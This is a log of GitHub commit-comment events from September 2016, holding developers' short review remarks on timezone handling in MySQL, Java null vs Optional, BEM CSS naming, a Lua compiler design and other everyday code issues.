{"id":"4578815649","type":"CommitCommentEvent","actor":{"login":"jeffjohnson9046"},"repo":{"name":"SmarterApp/TDS_Common"},"payload":{"comment":{"id":19067788,"position":16,"line":16,"path":"src/main/java/tds/common/data/mysql/InstantPropertyEditorSupport.java","commit_id":"eab8265cecca8b2bb5f87a67e777377b7feca9dc","created_at":"2016-09-17T22:55:12Z","updated_at":"2016-09-17T22:55:12Z","body":"The date coming from MySQL doesn't have the timezone associated to it.  The only way we know the dates are in UTC are as follows:\r\n\r\nLook at what the timezone for MySQL is set to:\r\n\r\n```\r\nmysql> SELECT @@global.time_zone;\r\n+--------------------+\r\n| @@global.time_zone |\r\n+--------------------+\r\n| SYSTEM             |\r\n+--------------------+\r\n```\r\nIn this case `SYSTEM` means \"slave to whatever the host machine is set to\".  So when I `ssh` into the server and look at the time settings, this is what I see:\r\n\r\n```\r\nubuntu@tds-db-deploy:~$ cat /etc/timezone\r\nEtc/UTC\r\nubuntu@tds-db-deploy:~$ date\r\nSat Sep 17 22:42:24 UTC 2016\r\n```\r\n\r\nSo the code above, while not necessarily elegant _definitely_ converts whatever came in as `value` to the local time (whatever time the JVM's clock is set to) and _again_ to the UTC time.  I do a similar (and equally messy) deal in the Session service to make sure I'm persisting a UTC date/time.\r\n\r\nSo thinking about it, there _could_ be a bug here; if the dates in the database are _not_ UTC, then we wouldn't necessarily be interpreting the date correctly w/the logic above.  We'd be pulling it out \"right\" an we'd be setting the POJO's date to the UTC offset of whatever the date is.  However, if we persist that UTC offset date to the database, it wouldn't be \"right\", because it wouldn't be in the same time zone.\r\n\r\nFor example (I kinda need to say this out loud to myself), if all dates are stored in PST, when we use the `InstantPropertyEditorSupport` the date would be converted to UTC in the POJO.  That's fine, as long as _all_ the dates we compare against are _also_ UTC.  If we save that POJO to the database _without_ converting back to PST, then we'd be storing the wrong date which could produce unexpected behavior (e.g. sessions would still be open when they shouldn't be, because UTC is 8 hours ahead of PST).\r\n\r\nSo, we could continue to use the `SELECT now()` and continue to use whatever time zone the MySQL server's set to.  Or we could draw a line in the sand and enforce UTC everywhere.  I think if we decide to enforce UTC everywhere, we may want to re-visit injecting a `System.Clock` into our programs to make sure we're all using the correct clock settings.  Also, someone who's hosting the system may be dead set against storing date/time in UTC.  If we inject a `System.Clock`, it could be configurable."}},"created_at":"2016-09-17T22:55:12Z"}
{"id":"4578815786","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":19067789,"position":41,"line":1531,"path":"app/src/main/java/com/kamron/pogoiv/Pokefly.java","commit_id":"41697da926f5c57fda16bc00055cc1a07d50064a","created_at":"2016-09-17T22:55:19Z","updated_at":"2016-09-17T22:55:19Z","body":"Well, I have considered using `Optional<String>`. That does have some overhead but it avoids this problem, and since the overhead is O(1) that's what I should have done. `null` is clear, but has the same type as a `File`."}},"created_at":"2016-09-17T22:55:19Z"}
{"id":"4578815825","type":"CommitCommentEvent","actor":{"login":"ThorstenHans"},"repo":{"name":"thinktecture/boardz-cross-platform-sample"},"payload":{"comment":{"id":19067790,"position":null,"line":null,"path":null,"commit_id":"c2ad7ed558fad717d1224d9c3eed60a1f3a6194b","created_at":"2016-09-17T22:55:21Z","updated_at":"2016-09-17T22:55:21Z","body":"The well known commit that keeps your profile one the project start page :)"}},"created_at":"2016-09-17T22:55:21Z"}
{"id":"4578816713","type":"CommitCommentEvent","actor":{"login":"ThorstenHans"},"repo":{"name":"thinktecture/boardz-cross-platform-sample"},"payload":{"comment":{"id":19067793,"position":3,"line":null,"path":".nvmrc","commit_id":"5386e6d339587fc51deb0932653231a72e1d48a6","created_at":"2016-09-17T22:56:07Z","updated_at":"2016-09-17T22:56:07Z","body":"StiemtStiemt"}},"created_at":"2016-09-17T22:56:07Z"}
{"id":"4578816800","type":"CommitCommentEvent","actor":{"login":"Bloke"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19067794,"position":null,"line":null,"path":null,"commit_id":"1d2d37f1aa37e089c23e44e14916864d1d809cba","created_at":"2016-09-17T22:56:11Z","updated_at":"2016-09-17T22:56:11Z","body":"See https://github.com/textpattern/textpattern/commit/605287ab0080abf9153de1d75eada0ef0084238e"}},"created_at":"2016-09-17T22:56:11Z"}
{"id":"4578819356","type":"CommitCommentEvent","actor":{"login":"Lesik"},"repo":{"name":"baskerville/sxhkd"},"payload":{"comment":{"id":19067800,"position":null,"line":null,"path":null,"commit_id":"1f903cd626afa5042a246ff7ec1cbab4ca9bd99e","created_at":"2016-09-17T22:58:19Z","updated_at":"2016-09-17T22:58:19Z","body":"Thank you for this."}},"created_at":"2016-09-17T22:58:19Z"}
{"id":"4578821258","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19067806,"position":null,"line":null,"path":null,"commit_id":"9455b381fede0ec0f320687d363e02581ccbaf47","created_at":"2016-09-17T22:59:50Z","updated_at":"2016-09-17T22:59:50Z","body":"NOTE: this is not just a indentation issue (as it might look) its a complete reordering and restructuring of all the code base by SANE standards.  Even IntelliJ wanted to puke all this out.  ugh..... "}},"created_at":"2016-09-17T22:59:50Z"}
{"id":"4578822306","type":"CommitCommentEvent","actor":{"login":"good-live"},"repo":{"name":"Bara20/TroubleinTerroristTown"},"payload":{"comment":{"id":19067809,"position":8,"line":829,"path":"addons/sourcemod/translations/ttt.phrases.txt","commit_id":"8c8b365c22def13e8ad2e84fa6f8ffbfb49c3bf9","created_at":"2016-09-17T23:00:35Z","updated_at":"2016-09-17T23:00:35Z","body":"@Bara20 Translatation upated ^^"}},"created_at":"2016-09-17T23:00:35Z"}
{"id":"4578823535","type":"CommitCommentEvent","actor":{"login":"leMaik"},"repo":{"name":"CraftenDev/GemExtras"},"payload":{"comment":{"id":19067813,"position":null,"line":null,"path":null,"commit_id":"5a86b5592fb930cc427d3cf6885593d0ab3751e5","created_at":"2016-09-17T23:01:27Z","updated_at":"2016-09-17T23:01:27Z","body":"This didn't fix it at all! :cry: Players can still fly (and it's a lot easier now)."}},"created_at":"2016-09-17T23:01:27Z"}
{"id":"4578824208","type":"CommitCommentEvent","actor":{"login":"gorbiz"},"repo":{"name":"gorbiz/touchart"},"payload":{"comment":{"id":19067815,"position":null,"line":null,"path":null,"commit_id":"af143d905381e037bc89e88c1038028459b6482c","created_at":"2016-09-17T23:01:57Z","updated_at":"2016-09-17T23:01:57Z","body":"![screenshot from 2016-09-18 00-58-24](https://cloud.githubusercontent.com/assets/207850/18611512/785f0f28-7d3b-11e6-9362-7ffbd478fe1a.png)\r\n"}},"created_at":"2016-09-17T23:01:57Z"}
{"id":"4578826464","type":"CommitCommentEvent","actor":{"login":"athoszxz"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":19067820,"position":null,"line":null,"path":null,"commit_id":"0d570a506a1b51f5333c7741c47e714d55c35ab2","created_at":"2016-09-17T23:02:59Z","updated_at":"2016-09-17T23:02:59Z","body":"In the video the woman says we have to do :\r\n\r\nTextView wordView = new TextView(this);\r\n\r\nTextView wordView2 = new TextView(this);\r\n\r\nTextView wordView3 = new TextView(this);\r\n\r\nEtc.\r\n\r\nBut when it comes the part to create the loop no longer needs it.\r\n\r\nThere's something wrong ..."}},"created_at":"2016-09-17T23:02:59Z"}
{"id":"4578832541","type":"CommitCommentEvent","actor":{"login":"jtreuting"},"repo":{"name":"SmarterApp/TDS_Common"},"payload":{"comment":{"id":19067833,"position":16,"line":16,"path":"src/main/java/tds/common/data/mysql/InstantPropertyEditorSupport.java","commit_id":"eab8265cecca8b2bb5f87a67e777377b7feca9dc","created_at":"2016-09-17T23:08:02Z","updated_at":"2016-09-17T23:08:02Z","body":"I think my question is this.  How does the java Timestamp toLocalDate know how to convert to whatever the local date is without telling it what timezone the original dates is in?\r\n\r\nI'm advocating making a rule that all dates are UTC and then there is no need to convert here because it comes out of the DB as utc and java deals with it as utc.\r\n\r\n"}},"created_at":"2016-09-17T23:08:02Z"}
{"id":"4578836897","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"ACID-Scripts/WOTLK"},"payload":{"comment":{"id":19067841,"position":5,"line":18627,"path":"acid_wotlk.sql","commit_id":"c1f4c9e06376dc4f58cf358310e8bfe1f02c4baa","created_at":"2016-09-17T23:11:42Z","updated_at":"2016-09-17T23:11:42Z","body":"('2247401','22474','11','0','100',___'0'___,'0','0','0','0',___'21'___,'0','0','0','11','39227','0','0','0','0','0','0','Unstable Fel-Imp - Disable melee and Cast transform spell on Spawn')\r\n\r\n1. spawn not repeatable\r\n2. maybe 21? 22 - set phase"}},"created_at":"2016-09-17T23:11:42Z"}
{"id":"4578837280","type":"CommitCommentEvent","actor":{"login":"arun1595"},"repo":{"name":"arun1595/ahl"},"payload":{"comment":{"id":19067843,"position":null,"line":null,"path":null,"commit_id":"a6e2e94fc9dab14c6aefe75463e4ac5b20fbd24e","created_at":"2016-09-17T23:12:01Z","updated_at":"2016-09-17T23:12:01Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;PoBfi3t4&#x2F;7-fix-display-issue-in-gallery-page\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Fix display issue in gallery page</a>"}},"created_at":"2016-09-17T23:12:01Z"}
{"id":"4578840885","type":"CommitCommentEvent","actor":{"login":"fardis314"},"repo":{"name":"fardis314/amirho3in79"},"payload":{"comment":{"id":19067851,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-17T23:14:48Z","updated_at":"2016-09-17T23:14:48Z","body":"168398326"}},"created_at":"2016-09-17T23:14:48Z"}
{"id":"4578844532","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":19067867,"position":41,"line":1531,"path":"app/src/main/java/com/kamron/pogoiv/Pokefly.java","commit_id":"41697da926f5c57fda16bc00055cc1a07d50064a","created_at":"2016-09-17T23:17:45Z","updated_at":"2016-09-17T23:17:45Z","body":"What do you mean same type as File? Do you want me to open that \"change stuff to null\" PR and rebase it? The empty string is also the same type as \"filename\". So, that's not any less error prone. Also, unnecessary object creating, passing around, etc.\r\n"}},"created_at":"2016-09-17T23:17:45Z"}
{"id":"4578846135","type":"CommitCommentEvent","actor":{"login":"groxxda"},"repo":{"name":"Mic92/nixpkgs"},"payload":{"comment":{"id":19067876,"position":36,"line":36,"path":"nixos/modules/services/networking/powerdns.nix","commit_id":"ef83a56d06635b3c93710cbdc4cd81dbbe7ec55b","created_at":"2016-09-17T23:19:12Z","updated_at":"2016-09-17T23:19:12Z","body":"network.target should be enough\r\n:+1:  on the hardening!"}},"created_at":"2016-09-17T23:19:12Z"}
{"id":"4578847301","type":"CommitCommentEvent","actor":{"login":"rfed"},"repo":{"name":"rfed/tp1-circulos"},"payload":{"comment":{"id":19067883,"position":null,"line":null,"path":null,"commit_id":"3184d537562fb80380f6d2917e8301059cfd6ce8","created_at":"2016-09-17T23:20:15Z","updated_at":"2016-09-17T23:20:15Z","body":"Modificación creación clase Circulo"}},"created_at":"2016-09-17T23:20:15Z"}
{"id":"4578848055","type":"CommitCommentEvent","actor":{"login":"briancain"},"repo":{"name":"briancain/vmfloaty"},"payload":{"comment":{"id":19067886,"position":null,"line":null,"path":null,"commit_id":"86e1792775578f850e597f0f4c7b85ea7b88cf34","created_at":"2016-09-17T23:20:57Z","updated_at":"2016-09-17T23:20:57Z","body":"/cc @johnmccabe :D"}},"created_at":"2016-09-17T23:20:57Z"}
{"id":"4578849606","type":"CommitCommentEvent","actor":{"login":"Bara20"},"repo":{"name":"Bara20/TroubleinTerroristTown"},"payload":{"comment":{"id":19067887,"position":8,"line":829,"path":"addons/sourcemod/translations/ttt.phrases.txt","commit_id":"8c8b365c22def13e8ad2e84fa6f8ffbfb49c3bf9","created_at":"2016-09-17T23:22:30Z","updated_at":"2016-09-17T23:22:30Z","body":"Done"}},"created_at":"2016-09-17T23:22:30Z"}
{"id":"4578851894","type":"CommitCommentEvent","actor":{"login":"joewadcan-test"},"repo":{"name":"joewadcan-test/demoapp"},"payload":{"comment":{"id":19067892,"position":7,"line":5,"path":"config/routes.rb","commit_id":"1cd8b04e561b474ae9f8bc9e8919e457b93d6c32","created_at":"2016-09-17T23:24:38Z","updated_at":"2016-09-17T23:24:38Z","body":"💥 "}},"created_at":"2016-09-17T23:24:38Z"}
{"id":"4578852442","type":"CommitCommentEvent","actor":{"login":"joewadcan-test"},"repo":{"name":"joewadcan-test/demoapp"},"payload":{"comment":{"id":19067894,"position":7,"line":5,"path":"config/routes.rb","commit_id":"1cd8b04e561b474ae9f8bc9e8919e457b93d6c32","created_at":"2016-09-17T23:25:02Z","updated_at":"2016-09-17T23:25:02Z","body":"💩 "}},"created_at":"2016-09-17T23:25:02Z"}
{"id":"4578852992","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19067896,"position":null,"line":null,"path":null,"commit_id":"3adfb03a0e7584a74b27994ee0f2dbe195b6ad55","created_at":"2016-09-17T23:25:30Z","updated_at":"2016-09-17T23:25:30Z","body":"That's silly.\r\nWhy split a package out and than make the base package rdepend on it?\r\n\r\nThe plugin/extension using it has to rdepend on it instead.\r\nElse we can as well reintegrate the files into core."}},"created_at":"2016-09-17T23:25:30Z"}
{"id":"4578853622","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19067898,"position":null,"line":null,"path":null,"commit_id":"3adfb03a0e7584a74b27994ee0f2dbe195b6ad55","created_at":"2016-09-17T23:26:04Z","updated_at":"2016-09-17T23:26:04Z","body":"BTW: -enterprise is not on the feed yet, I'll add it there first.\r\n"}},"created_at":"2016-09-17T23:26:04Z"}
{"id":"4578854718","type":"CommitCommentEvent","actor":{"login":"nathanchance"},"repo":{"name":"frap129/angler"},"payload":{"comment":{"id":19067900,"position":null,"line":null,"path":null,"commit_id":"9ec8b402ef341ee877e6334ff4495d1996e4c835","created_at":"2016-09-17T23:27:02Z","updated_at":"2016-09-17T23:27:02Z","body":"Holy crap that's awesome!"}},"created_at":"2016-09-17T23:27:02Z"}
{"id":"4578855598","type":"CommitCommentEvent","actor":{"login":"UVLabs"},"repo":{"name":"contactashish13/intergeo-maps"},"payload":{"comment":{"id":19067903,"position":null,"line":null,"path":null,"commit_id":"efe9f6df58ede4b20980e456232f66f4e22119d3","created_at":"2016-09-17T23:27:51Z","updated_at":"2016-09-17T23:27:51Z","body":"@contactashish13 I believe you should do `if ( ! get_option(\"intergeo_map_api_key\")) {`"}},"created_at":"2016-09-17T23:27:51Z"}
{"id":"4578857614","type":"CommitCommentEvent","actor":{"login":"rogerdahl"},"repo":{"name":"django/django"},"payload":{"comment":{"id":19067906,"position":29,"line":405,"path":"django/core/urlresolvers.py","commit_id":"31b5275235bac150a54059db0288a19b9e0516c7","created_at":"2016-09-17T23:29:46Z","updated_at":"2016-09-17T23:29:46Z","body":"Well, this wasn't really about a change in the code but about a fairly general statement you made about how WSGI works. Thanks for the reply though. I'll keep investigating."}},"created_at":"2016-09-17T23:29:46Z"}
{"id":"4578861427","type":"CommitCommentEvent","actor":{"login":"vheon"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":19067921,"position":null,"line":null,"path":null,"commit_id":"5dca552d5daee69c064374146bcda9e63be63b20","created_at":"2016-09-17T23:33:07Z","updated_at":"2016-09-17T23:33:07Z","body":"@sumeetb25 if you're using the vim that ships with Ubuntu 14.04 than there is a bug in that version of vim which prevents this for working. There is #2337 with a fix for that version of vim but we're actually thinking of bumping the minimum vim version to 7.4.143."}},"created_at":"2016-09-17T23:33:07Z"}
{"id":"4578861803","type":"CommitCommentEvent","actor":{"login":"Emmanuel-Benvenutto"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067923,"position":17,"line":17,"path":"00-HTML-CSS-basics/Ejercicio 2.1/index.html","commit_id":"897b192e43b0ecf41edc9ef67bdd4ebfdffc364c","created_at":"2016-09-17T23:33:26Z","updated_at":"2016-09-17T23:33:26Z","body":"Fer, intenté utilizar BEM...pero tomé ejemplos de este link y son distintos\na como vos me plantéas...\n\nhttp://getbem.com/naming/\n\nPor ejemplo, el que está al final de la página:\n\n.form__submit--disabled { }\n\nAhí utiliza \"__\" para agregar un elemento al bloque.\n\nTendría que usar \"--\" para el elemento entonces?\n\n\n\n2016-09-17 18:18 GMT-03:00 fercho8787 <notifications@github.com>:\n\n> Remember that according to our standard, BEM should be written like:\n> *Block--Element_Modifier*\n>\n> I like to see that you implemented BEM.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Emmanuel-Benvenutto/startup/commit/897b192e43b0ecf41edc9ef67bdd4ebfdffc364c#commitcomment-19067243>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVHMRk_XtpQ_rEaopJ-Soai0396x5v6vks5qrFkwgaJpZM4J_t2F>\n> .\n>\n"}},"created_at":"2016-09-17T23:33:26Z"}
{"id":"4578862095","type":"CommitCommentEvent","actor":{"login":"millerts"},"repo":{"name":"SmarterApp/TDS_Common"},"payload":{"comment":{"id":19067925,"position":16,"line":16,"path":"src/main/java/tds/common/data/mysql/InstantPropertyEditorSupport.java","commit_id":"eab8265cecca8b2bb5f87a67e777377b7feca9dc","created_at":"2016-09-17T23:33:43Z","updated_at":"2016-09-17T23:33:43Z","body":"Yes, all new systems for sure should be UTC. I also think the same should be true for any deployment going forward"}},"created_at":"2016-09-17T23:33:43Z"}
{"id":"4578866360","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19067939,"position":null,"line":null,"path":null,"commit_id":"48adbb4ad64dc18db1d4197d1a3b7de4292f8199","created_at":"2016-09-17T23:37:38Z","updated_at":"2016-09-17T23:37:38Z","body":"Where can I find the recipe for \"VMC\"?\r\n"}},"created_at":"2016-09-17T23:37:38Z"}
{"id":"4578868025","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-common"},"payload":{"comment":{"id":19067945,"position":null,"line":null,"path":null,"commit_id":"0cbb9c88dc747d8521be9e452b21b15bfdd98196","created_at":"2016-09-17T23:39:08Z","updated_at":"2016-09-17T23:39:08Z","body":"Ok, updated translations and NEWS in some projects, more to do tomorrow."}},"created_at":"2016-09-17T23:39:08Z"}
{"id":"4578868484","type":"CommitCommentEvent","actor":{"login":"Faore"},"repo":{"name":"shihrer/csci446.project1"},"payload":{"comment":{"id":19067949,"position":null,"line":null,"path":null,"commit_id":"3a937a68abfb590c6706071b726e88156bbc8d2c","created_at":"2016-09-17T23:39:31Z","updated_at":"2016-09-17T23:39:31Z","body":"Make sure to be using this version of the graph system to test your code with. Otherwise you may have trouble solving unsolvable graphs."}},"created_at":"2016-09-17T23:39:31Z"}
{"id":"4578870175","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"ACID-Scripts/WOTLK"},"payload":{"comment":{"id":19067953,"position":5,"line":18627,"path":"acid_wotlk.sql","commit_id":"c1f4c9e06376dc4f58cf358310e8bfe1f02c4baa","created_at":"2016-09-17T23:40:57Z","updated_at":"2016-09-17T23:40:57Z","body":":+1: \r\nnext time i'll check better before push someones fixes :(\r\nthx @boxa"}},"created_at":"2016-09-17T23:40:57Z"}
{"id":"4578870581","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067954,"position":9,"line":9,"path":"experiments/amulet/design/ReadMe.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:41:22Z","updated_at":"2016-09-17T23:41:22Z","body":"Which bit? I thought splitting docs up would be helpful."}},"created_at":"2016-09-17T23:41:22Z"}
{"id":"4578871029","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067958,"position":9,"line":15,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:41:46Z","updated_at":"2016-09-17T23:41:46Z","body":"I kinda like the idea of a non-terminating type. However not a priority."}},"created_at":"2016-09-17T23:41:46Z"}
{"id":"4578871516","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067960,"position":47,"line":111,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:42:15Z","updated_at":"2016-09-17T23:42:15Z","body":"I haven't touched this bit since the initial Amulet commit: this is changes copied from there."}},"created_at":"2016-09-17T23:42:15Z"}
{"id":"4578872015","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067961,"position":57,"line":189,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:42:44Z","updated_at":"2016-09-17T23:42:44Z","body":"A tagged union is a sum type. Eh, I haven't touched this bit since the initial Amulet commit: this is changes copied from there."}},"created_at":"2016-09-17T23:42:44Z"}
{"id":"4578873513","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067965,"position":73,"line":248,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:44:07Z","updated_at":"2016-09-17T23:44:07Z","body":"Yes, there would be a type class called something like `Close` or `Dispose` with a `close`/`dispose` method. I need to think of ways to stop it being called it twice."}},"created_at":"2016-09-17T23:44:07Z"}
{"id":"4578874606","type":"CommitCommentEvent","actor":{"login":"Lesik"},"repo":{"name":"baskerville/bspwm"},"payload":{"comment":{"id":19067970,"position":null,"line":null,"path":null,"commit_id":"2b5cf373dd3c96dc0c5c3b44fef911ab47f2712a","created_at":"2016-09-17T23:45:04Z","updated_at":"2016-09-17T23:45:04Z","body":"This was fixed in 0.9.1. Thank you."}},"created_at":"2016-09-17T23:45:04Z"}
{"id":"4578875901","type":"CommitCommentEvent","actor":{"login":"Vahid19"},"repo":{"name":"Vahid19/repose2"},"payload":{"comment":{"id":19067975,"position":null,"line":null,"path":null,"commit_id":"fde2d64f154a8dea1863e3aa5f417898dad64b17","created_at":"2016-09-17T23:46:11Z","updated_at":"2016-09-17T23:46:11Z","body":"commit"}},"created_at":"2016-09-17T23:46:11Z"}
{"id":"4578876339","type":"CommitCommentEvent","actor":{"login":"ksm1807"},"repo":{"name":"ksm1807/ProgrammingAssignment2"},"payload":{"comment":{"id":19067976,"position":null,"line":null,"path":null,"commit_id":"37b8af6d137aca60961db221cb70b9e812261e26","created_at":"2016-09-17T23:46:35Z","updated_at":"2016-09-17T23:46:35Z","body":"these are functions about makeCacheMatrix and cacheSolve "}},"created_at":"2016-09-17T23:46:35Z"}
{"id":"4578879139","type":"CommitCommentEvent","actor":{"login":"jtigger"},"repo":{"name":"exercism/xjava"},"payload":{"comment":{"id":19067987,"position":null,"line":null,"path":null,"commit_id":"37721c40bf71dd71929a6a0a133c2263b45b0768","created_at":"2016-09-17T23:49:02Z","updated_at":"2016-09-17T23:49:02Z","body":"@kytrinyx this track is ready for a deploy, at your leisure."}},"created_at":"2016-09-17T23:49:02Z"}
{"id":"4578879445","type":"CommitCommentEvent","actor":{"login":"tgtje"},"repo":{"name":"e107inc/e107"},"payload":{"comment":{"id":19067990,"position":null,"line":null,"path":null,"commit_id":"0aac01de3d9f7d454378108623cfcc6f377cc651","created_at":"2016-09-17T23:49:19Z","updated_at":"2016-09-17T23:49:19Z","body":"Please correct : line 889 e107::getMessage()->addError(ADLAN_PM_90'); \r\n  ( the **'** after 90  throws s yntax error, unexpected '');' (T_CONSTANT_ENCAPSED_STRING) )"}},"created_at":"2016-09-17T23:49:19Z"}
{"id":"4578880557","type":"CommitCommentEvent","actor":{"login":"bulawow"},"repo":{"name":"TehCheat/PoEHUD"},"payload":{"comment":{"id":19067993,"position":null,"line":null,"path":null,"commit_id":"975c8ef67ed31bdc68025c7bcca152a4feb56748","created_at":"2016-09-17T23:50:22Z","updated_at":"2016-09-17T23:50:22Z","body":"its possible to add essence of corruption ?"}},"created_at":"2016-09-17T23:50:22Z"}
{"id":"4578880892","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19067994,"position":null,"line":null,"path":null,"commit_id":"22cd370c89f25356b9f06ebe878a05f3ec4e3124","created_at":"2016-09-17T23:50:41Z","updated_at":"2016-09-17T23:50:41Z","body":"Teams that want to have these in their images can add them to \r\n`./meta-oe-alliance/meta-oe/recipes-distros/<distro>\\image\\<distro>-base.bb`:\r\nhere:\r\n`RDEPENDS_${PN} = \"\\\r\n    python-twisted-enterprise \\\r\n    oe-alliance-base \\\r\n....\r\n`"}},"created_at":"2016-09-17T23:50:41Z"}
{"id":"4578882541","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067997,"position":9,"line":0,"path":"experiments/amulet/design/ReadMe.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:52:18Z","updated_at":"2016-09-17T23:52:18Z","body":"The library bit, sorry."}},"created_at":"2016-09-17T23:52:18Z"}
{"id":"4578883395","type":"CommitCommentEvent","actor":{"login":"jcansdale"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19068002,"position":181,"line":32,"path":"src/BenchmarkDotNet.Core/Jobs/JobExtensions.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-17T23:53:10Z","updated_at":"2016-09-17T23:53:10Z","body":"Could this be overloaded to accept (int ms) and/or (double value, TimeUnit unit)? Otherwise setting it seems quite verbose."}},"created_at":"2016-09-17T23:53:10Z"}
{"id":"4578883980","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19068003,"position":8,"line":8,"path":"experiments/amulet/design/00-overview.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:53:42Z","updated_at":"2016-09-17T23:53:42Z","body":"There are several methods I've been considering:\r\n - No mutability: the easy way. Might be easier to at least go this way initially.\r\n - `ST` monad.\r\n - Some sort of `Mutable a` monad which allows mutating an object. Can only be made when initially creating the object. Can be unwrapped to the normal immutable object: you shouldn't be able to keep it around afterwards."}},"created_at":"2016-09-17T23:53:42Z"}
{"id":"4578884332","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19068005,"position":47,"line":0,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:54:00Z","updated_at":"2016-09-17T23:54:00Z","body":"If we have type magic I think that `'` would be better for promoted type constructors."}},"created_at":"2016-09-17T23:54:00Z"}
{"id":"4578884925","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19068008,"position":73,"line":0,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T23:54:32Z","updated_at":"2016-09-17T23:54:32Z","body":"UNIQUENESS TYPES!"}},"created_at":"2016-09-17T23:54:32Z"}
{"id":"4578885704","type":"CommitCommentEvent","actor":{"login":"kevinob11"},"repo":{"name":"nodemailer/nodemailer-wellknown"},"payload":{"comment":{"id":19068009,"position":null,"line":null,"path":null,"commit_id":"8fbff6cfb569042f59b7afab5451a2df85cd81dd","created_at":"2016-09-17T23:55:12Z","updated_at":"2016-09-17T23:55:12Z","body":"Any idea on a timeline for a release of this? I'd love to switch to this instead of setting up office 365 my self."}},"created_at":"2016-09-17T23:55:12Z"}
{"id":"4578886291","type":"CommitCommentEvent","actor":{"login":"berkerpeksag"},"repo":{"name":"celery/celery"},"payload":{"comment":{"id":19068011,"position":null,"line":null,"path":null,"commit_id":"fff12f08af8539c3e2e3c73733e69ce26e98194a","created_at":"2016-09-17T23:55:45Z","updated_at":"2016-09-17T23:55:45Z","body":"Django 1.7 and older versions are EOL. Perhaps we should support Django 1.8+ in Celery 4.0?"}},"created_at":"2016-09-17T23:55:45Z"}
{"id":"4578886477","type":"CommitCommentEvent","actor":{"login":"aofsecret77"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19068014,"position":null,"line":null,"path":null,"commit_id":"897196fdf51f54809d0caf4a937e1f6ab73a2108","created_at":"2016-09-17T23:55:58Z","updated_at":"2016-09-17T23:55:58Z","body":"ตอนนี้เจอบัคถ้าหากพิมตอบในเกมแล้วจะหลุดครับ ทำให้ไม่สามารถตอบซิบ หรือ พิมคุยกับใครในเกมได้ "}},"created_at":"2016-09-17T23:55:58Z"}
